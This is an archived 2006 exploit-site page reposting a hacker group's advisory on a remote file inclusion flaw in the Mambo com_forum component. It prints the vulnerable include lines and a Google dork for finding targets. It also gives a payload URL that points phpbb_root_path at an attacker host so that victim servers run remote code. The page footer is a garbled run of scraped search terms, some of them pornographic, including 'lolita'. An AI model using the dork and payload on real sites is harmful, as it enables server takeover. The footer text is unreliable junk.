about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability




2006-07-09 com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download :
http://mamboxchange.com/frs/download.php/6873/phpbb_component1.2.4RC3.zip

bug found in file : download.php

define('IN_PHPBB', true);
//$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc ');
include($phpbb_root_path . 'common.'.$phpEx);


google dork: inurl:com_forum

http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[attacker]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha,
#papmahackerlink

securitydot.net - 2006-07-09

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:16:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
blackgirls 1 union se exploits f mailer t88t Wwwsex.Co contentser school sex ls lolita MicrosoftT Arabiksex shemalbigc www.sdxinm php-nuke 2 sexyphotto XMB 1.9.11 sexyphotto pitchure www.wym86. charon www.zql.yn &amp;a Lank sex www.qc99.c www.nhmaa. sex13 farm Indianporn voman.com Vidio kawe Xobile news for c video 3gp news for c Wild Hogs nginx/0.5. 200 /compo www.bbcont news for c Xoop Sexes girl Vdio.SEXy. WWW.chatpe Galery ww.hi5.com ssh client webcalneda Apache/1.3 poll_cooki www.pt85.c global ann